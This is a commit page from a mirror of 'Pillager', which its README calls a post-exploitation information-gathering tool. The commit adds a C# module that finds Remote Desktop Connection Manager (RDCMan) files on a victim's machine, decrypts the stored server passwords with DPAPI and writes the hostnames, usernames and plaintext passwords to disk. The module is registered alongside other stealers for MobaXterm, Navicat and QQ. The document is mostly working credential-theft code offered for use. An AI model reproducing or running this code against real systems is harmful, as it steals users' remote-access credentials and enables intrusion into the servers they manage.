qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add RDCMan password recovery

This commit is contained in:
Adminxe 2023-11-13 00:40:17 +08:00
parent 689fadc63e
commit 44a9b70b71
4 changed files with 117 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
Pillager/Pillager.csproj
View File

@ -77,6 +77,7 @@
<Compile Include="Helper\SQLiteHandler.cs" />
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="Tools\Navicat.cs" />
<Compile Include="Tools\RDCMan.cs" />
<Compile Include="Tools\Xmanager.cs" />
</ItemGroup>
<ItemGroup>

1
Pillager/Program.cs
View File

@ -30,6 +30,7 @@ namespace Pillager
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
Navicat.Save(savepath);
RDCMan.Save(savepath);
//Messengers
QQ.Save(savepath);

114
Pillager/Tools/RDCMan.cs Normal file
View File

@ -0,0 +1,114 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Xml;
namespace Pillager.Tools
{
internal class RDCMan
{
public static string ToolName = "RDCMan";
public static string DecryptPwd()
{
StringBuilder sb = new StringBuilder();
var RDGFiles = new List<string>();
var RDCManSettings = new XmlDocument();
string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
RDCManSettings.LoadXml(File.ReadAllText(rdgPath));
var nodes = RDCManSettings.SelectNodes("//FilesToOpen");
foreach (XmlNode node in nodes)
{
var RDGFilePath = node.InnerText;
if (!RDGFiles.Contains(RDGFilePath))
{
RDGFiles.Add(RDGFilePath);
}
}
foreach (string RDGFile in RDGFiles)
{
sb.AppendLine(ParseRDGFile(RDGFile));
}
return sb.ToString();
}
private static string DecryptPassword(string password)
{
byte[] passwordBytes = Convert.FromBase64String(password);
password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser)).Replace("\0", "");
return password;
}
private static string ParseRDGFile(string RDGPath)
{
StringBuilder stringBuilder = new StringBuilder();
try
{
XmlDocument RDGFileConfig = new XmlDocument();
RDGFileConfig.LoadXml(File.ReadAllText(RDGPath));
XmlNodeList nodes = RDGFileConfig.SelectNodes("//server");
foreach (XmlNode node in nodes)
{
string hostname = string.Empty, profilename = string.Empty, username = string.Empty, password = string.Empty, domain = string.Empty;
foreach (XmlNode subnode in node)
{
foreach (XmlNode subnode_1 in subnode)
{
switch (subnode_1.Name)
{
case "name":
hostname = subnode_1.InnerText;
break;
case "profileName":
profilename = subnode_1.InnerText;
break;
case "userName":
username = subnode_1.InnerText;
break;
case "password":
password = subnode_1.InnerText;
break;
case "domain":
domain = subnode_1.InnerText;
break;
}
}
}
if (!string.IsNullOrEmpty(password))
{
var decrypted = DecryptPassword(password);
if (!string.IsNullOrEmpty(decrypted))
{
stringBuilder.AppendLine("hostname: " + hostname);
stringBuilder.AppendLine("profilename: " + profilename);
stringBuilder.AppendLine("username: " + $"{domain}\\{username}");
stringBuilder.AppendLine("decrypted: " + decrypted);
stringBuilder.AppendLine();
}
}
}
}
catch { }
return stringBuilder.ToString();
}
public static void Save(string path)
{
try
{
string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
if (!File.Exists(rdgPath)) return;
string savepath = Path.Combine(path, ToolName);
Directory.CreateDirectory(savepath);
string output = DecryptPwd();
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
}
catch { }
}
}
}

1
README.md
View File

@ -53,6 +53,7 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
| MobaXterm | Password/Credential |
| Xmanager | Password |
| Navicat | Password |
| RDCMan | Password |
| Others | Support |
| :----: | :------: |